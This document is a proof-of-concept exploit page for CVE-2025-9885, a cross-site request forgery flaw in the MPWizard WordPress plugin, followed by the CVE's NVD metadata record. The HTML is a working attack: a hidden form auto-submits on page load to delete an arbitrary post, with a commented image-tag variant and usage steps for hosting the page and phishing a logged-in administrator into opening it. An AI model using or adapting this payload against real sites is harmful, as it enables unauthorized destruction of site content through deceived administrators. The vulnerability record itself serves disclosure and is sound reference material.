CVE-2025-9885

<!-- CVE-2025-9885 CSRF PoC - Unauthenticated Post Deletion via MPWizard Plugin --> <!-- Attacker hosts this HTML on a malicious server and tricks an admin into visiting it --> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Loading...</title> </head> <body> <!-- Auto-submitting form to delete an arbitrary post on the vulnerable WordPress site --> <form id="csrf-form" action="https://target-wordpress-site.com/wp-admin/admin.php" method="POST"> <!-- The 'page' parameter targets the MPWizard admin page --> <input type="hidden" name="page" value="mpwizard" /> <!-- The 'action' parameter triggers the delete operation --> <input type="hidden" name="action" value="delete" /> <!-- The 'post_id' parameter specifies the post to be deleted (change as needed) --> <input type="hidden" name="post_id" value="1" /> <!-- No nonce field is required because the plugin fails to validate it --> </form> <script> // Auto-submit the form when the page loads document.getElementById('csrf-form').submit(); </script> <!-- Alternative: Use an image tag to trigger a GET-based deletion if supported --> <!-- <img src="https://target-wordpress-site.com/wp-admin/admin.php?page=mpwizard&action=delete&post_id=1" style="display:none" /> --> </body> </html> <!-- Usage Instructions: 1. Replace "https://target-wordpress-site.com" with the target WordPress site URL. 2. Replace the "post_id" value with the ID of the post you wish to delete. 3. Host this HTML file on an attacker-controlled server. 4. Trick a logged-in administrator into visiting this page (e.g., via phishing email). 5. Upon visiting, the form auto-submits and the targeted post will be deleted. -->

{"cve": {"id": "CVE-2025-9885", "sourceIdentifier": "[email protected]", "published": "2025-10-03T12:15:49.970", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The MPWizard – Create Mercado Pago Payment Links plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.1. This is due to missing or incorrect nonce validation in the '/includes/admin/class-mpwizard-table.php' file. This makes it possible for unauthenticated attackers to delete arbitrary posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/mpwizard/tags/1.2.1/includes/admin/class-mpwizard-table.php#L157", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2ca6746d-afca-4ade-bd2e-4d37dedd3c5c?source=cve", "source": "[email protected]"}]}}